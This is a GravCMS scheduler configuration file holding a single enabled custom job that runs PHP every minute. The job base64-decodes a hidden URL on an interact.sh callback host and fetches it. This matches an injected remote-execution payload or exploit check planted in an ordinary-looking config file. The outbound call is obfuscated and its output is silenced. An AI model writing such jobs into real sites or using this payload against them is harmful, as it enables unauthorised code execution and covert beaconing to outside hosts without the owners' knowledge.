title: GravCMS
custom_jobs:
  4uehrn:
    command: /usr/bin/php
    args: '-r file_get_contents(base64_decode("aHR0cDovLzBmbnh3ZzdxcTMuNDRyOThkbDQ2ZDUxNDczdGxmbTJnZzNrYzhrODQ0eGpoLmludGVyYWN0LnNo"));'
    at: '* * * * *'
    output: null
    output_mode: overwrite
status:
  4uehrn: enabled
